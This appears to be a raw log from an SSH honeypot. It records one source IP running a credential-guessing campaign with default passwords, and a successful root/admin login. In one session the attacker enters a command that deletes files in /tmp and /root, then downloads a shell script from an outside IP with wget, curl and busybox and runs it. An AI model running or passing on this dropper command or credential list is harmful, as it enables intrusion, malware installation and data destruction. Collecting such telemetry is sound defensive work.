{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.982708Z","src_ip":"212.227.125.160","session":"e821643035ec"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.984126Z","src_ip":"212.227.125.160","session":"07d50f3ab65f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:35.985641Z","src_ip":"212.227.125.160","session":"cb61c17f2b45"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"admin","message":"login attempt [ubnt/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.106869Z","src_ip":"212.227.125.160","session":"34becd03146d"}
{"eventid":"cowrie.login.failed","username":"pi","password":"admin","message":"login attempt [pi/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.107940Z","src_ip":"212.227.125.160","session":"39a157f1936a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.109139Z","src_ip":"212.227.125.160","session":"68b55c172fc9"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin","message":"login attempt [ftpuser/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.110510Z","src_ip":"212.227.125.160","session":"55360f5a5063"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.111803Z","src_ip":"212.227.125.160","session":"e821643035ec"}
{"eventid":"cowrie.login.failed","username":"student","password":"admin","message":"login attempt [student/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.113653Z","src_ip":"212.227.125.160","session":"c21f94e2f119"}
{"eventid":"cowrie.login.failed","username":"noc","password":"admin","message":"login attempt [noc/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.114899Z","src_ip":"212.227.125.160","session":"07d50f3ab65f"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin","message":"login attempt [ftpuser/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.119302Z","src_ip":"212.227.125.160","session":"cb61c17f2b45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49606,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fe7c20dd1a7","protocol":"ssh","message":"New connection: 212.227.125.160:49606 (1.2.3.4:22) [session: 3fe7c20dd1a7]","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.199101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.200500Z","src_ip":"212.227.125.160","session":"3fe7c20dd1a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:06:36.216604Z","src_ip":"212.227.125.160","session":"e821643035ec"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.217195Z","src_ip":"212.227.125.160","session":"e821643035ec"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.242396Z","src_ip":"212.227.125.160","session":"3fe7c20dd1a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.263813Z","src_ip":"212.227.125.160","session":"e821643035ec"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.264870Z","src_ip":"212.227.125.160","session":"e821643035ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49630,"dst_ip":"1.2.3.4","dst_port":22,"session":"75dcc5cce3a1","protocol":"ssh","message":"New connection: 212.227.125.160:49630 (1.2.3.4:22) [session: 75dcc5cce3a1]","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.305940Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.317686Z","src_ip":"212.227.125.160","session":"75dcc5cce3a1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.355716Z","src_ip":"212.227.125.160","session":"75dcc5cce3a1"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.488503Z","src_ip":"212.227.125.160","session":"3fe7c20dd1a7"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.557465Z","src_ip":"212.227.125.160","session":"75dcc5cce3a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T07:06:36.621890Z","src_ip":"212.227.125.160","session":"3fe7c20dd1a7"}
{"eventid":"cowrie.command.input","input":"cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh","message":"CMD: cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.622696Z","src_ip":"212.227.125.160","session":"3fe7c20dd1a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16","size":139,"shasum":"ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.701853Z","src_ip":"212.227.125.160","session":"3fe7c20dd1a7"}
{"eventid":"cowrie.session.file_download","url":"http://178.16.54.252/bins.sh","outfile":"var/lib/cowrie/downloads/8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593","shasum":"8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.744242Z","message":"Downloaded URL (http://178.16.54.252/bins.sh) with SHA-256 8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593 to var/lib/cowrie/downloads/8607fd1092f732fb044e723712ce658abb1c98bdedb534d15fd9e8451ce55593","src_ip":"212.227.125.160","session":"3fe7c20dd1a7"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:36.787223Z","src_ip":"212.227.125.160","session":"3fe7c20dd1a7"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.176259Z","src_ip":"212.227.125.160","session":"39a157f1936a"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.180499Z","src_ip":"212.227.125.160","session":"34becd03146d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.181283Z","src_ip":"212.227.125.160","session":"55360f5a5063"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.184552Z","src_ip":"212.227.125.160","session":"cb61c17f2b45"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.188079Z","src_ip":"212.227.125.160","session":"07d50f3ab65f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.190218Z","src_ip":"212.227.125.160","session":"c21f94e2f119"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.199032Z","src_ip":"212.227.125.160","session":"68b55c172fc9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49694,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea5c75ec7181","protocol":"ssh","message":"New connection: 212.227.125.160:49694 (1.2.3.4:22) [session: ea5c75ec7181]","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.229794Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49696,"dst_ip":"1.2.3.4","dst_port":22,"session":"f848a8e917f5","protocol":"ssh","message":"New connection: 212.227.125.160:49696 (1.2.3.4:22) [session: f848a8e917f5]","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.231191Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49708,"dst_ip":"1.2.3.4","dst_port":22,"session":"d68ebf8c032c","protocol":"ssh","message":"New connection: 212.227.125.160:49708 (1.2.3.4:22) [session: d68ebf8c032c]","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.233986Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49714,"dst_ip":"1.2.3.4","dst_port":22,"session":"99eb28dd9e31","protocol":"ssh","message":"New connection: 212.227.125.160:49714 (1.2.3.4:22) [session: 99eb28dd9e31]","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.239344Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49724,"dst_ip":"1.2.3.4","dst_port":22,"session":"47f6047ec0b3","protocol":"ssh","message":"New connection: 212.227.125.160:49724 (1.2.3.4:22) [session: 47f6047ec0b3]","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.245479Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49728,"dst_ip":"1.2.3.4","dst_port":22,"session":"d416bf707678","protocol":"ssh","message":"New connection: 212.227.125.160:49728 (1.2.3.4:22) [session: d416bf707678]","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.246369Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49734,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4b64f530d38","protocol":"ssh","message":"New connection: 212.227.125.160:49734 (1.2.3.4:22) [session: c4b64f530d38]","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.247136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.255339Z","src_ip":"212.227.125.160","session":"f848a8e917f5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.261755Z","src_ip":"212.227.125.160","session":"d68ebf8c032c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.264578Z","src_ip":"212.227.125.160","session":"ea5c75ec7181"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.265686Z","src_ip":"212.227.125.160","session":"99eb28dd9e31"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.282780Z","src_ip":"212.227.125.160","session":"47f6047ec0b3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.288802Z","src_ip":"212.227.125.160","session":"c4b64f530d38"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.294544Z","src_ip":"212.227.125.160","session":"ea5c75ec7181"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.302687Z","src_ip":"212.227.125.160","session":"d416bf707678"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.303382Z","src_ip":"212.227.125.160","session":"d416bf707678"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.304833Z","src_ip":"212.227.125.160","session":"99eb28dd9e31"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:37.308034Z","src_ip":"212.227.125.160","session":"f848a8e917f5"}
